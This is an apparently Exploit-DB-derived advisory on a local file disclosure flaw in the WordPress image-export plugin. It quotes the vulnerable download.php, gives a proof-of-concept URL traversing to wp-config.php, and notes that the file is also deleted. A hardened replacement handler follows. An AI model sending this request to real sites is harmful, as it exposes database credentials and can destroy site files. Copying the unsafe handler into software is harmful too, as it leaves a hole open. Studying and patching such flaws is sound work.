Vendor: Image-Export
By: AMAR^SHG
CVSS: 7,5 (HIGH)
Vulnerability: Local File Disclosure
CWE: 200
Product Name: Image-Export
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: Yes
Related CWE: N/A
CPE: a:1efthander:image-export
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows/Unix
Year: 2016

WordPress image-export LFD

The download.php file in the WordPress image-export plugin is vulnerable to Local File Disclosure. An attacker can use the 'file' GET parameter to access any file on the server, including the WordPress core, by sending a request to download.php with 'file' set to the path of the file to be accessed, such as '../../../wp-config.php'.

Mitigation:

Update to the latest version of the plugin.

Exploit-DB raw data:

# Exploit Title: Wordpress image-export LFD
# Date: 03/21/2016
# Exploit Author: AMAR^SHG
# Vendor Homepage: http://www.1efthander.com
# Software Link: http://www.1efthander.com/category/wordpress-plugins/image-export
# Version: Everything is affected including latest (1.1.0 )
# Tested on: Windows/Unix on localhost

download.php file code:

<?php
if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
	$file = $_GET['file'];

	header( 'Content-Type: application/zip' );
	header( 'Content-Disposition: attachment; filename="' . $file . '"' );
	readfile( $file );
	unlink( $file );
	
	exit;
}
?>

Proof of concept:

Note that because of the unlink, we potentially can destroy the wordpress core.

Simply add the get parameter file:

localhost/wp/wp-content/plugins/image-export/download.php?file=../../../wp-config.php

Found by AMAR^SHG (Shkupi Hackers Group)
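
A hardened form of the download.php handler quoted above, as an added example that is not the plugin's or the exploit author's code. It assumes exports are ZIP archives kept in one dedicated directory; `EXPORT_DIR` and `resolve_export()` are hypothetical names introduced for illustration.

```php
<?php
// Added example: hardened variant of download.php (not the plugin's own code).
// ASSUMPTION: exports are ZIP archives written to one dedicated directory.
// EXPORT_DIR is a hypothetical location; point it at the real export folder.
define( 'EXPORT_DIR', __DIR__ . '/exports' );

// Map a client-supplied name to a file inside $export_dir, or return null.
function resolve_export( $requested, $export_dir ) {
	// Rejects missing values and array input such as ?file[]=x.
	if ( ! is_string( $requested ) || $requested === '' ) {
		return null;
	}
	// Allow-list: a bare file name ending in .zip, with no path separators.
	if ( ! preg_match( '/\A[A-Za-z0-9][A-Za-z0-9._-]{0,99}\.zip\z/', $requested ) ) {
		return null;
	}
	$base = realpath( $export_dir );
	$path = realpath( $export_dir . DIRECTORY_SEPARATOR . $requested );
	if ( $base === false || $path === false ) {
		return null; // directory or file does not exist
	}
	// realpath() resolves symlinks; confirm the result is still under $base.
	if ( strncmp( $path, $base . DIRECTORY_SEPARATOR, strlen( $base ) + 1 ) !== 0 ) {
		return null;
	}
	return is_file( $path ) ? $path : null;
}

$path = resolve_export( isset( $_GET['file'] ) ? $_GET['file'] : null, EXPORT_DIR );
if ( $path === null ) {
	http_response_code( 404 );
	exit;
}

header( 'Content-Type: application/zip' );
// basename() of a validated name: no quotes or CR/LF can reach the header.
header( 'Content-Disposition: attachment; filename="' . basename( $path ) . '"' );
header( 'X-Content-Type-Options: nosniff' );
readfile( $path );
unlink( $path ); // only ever reaches a validated .zip inside EXPORT_DIR
exit;
```

This confines both `readfile()` and `unlink()` to the export directory, so a value such as `../../../wp-config.php` fails the name check and returns 404. It does not add authentication: the script is still reachable directly, so access control has to be handled separately.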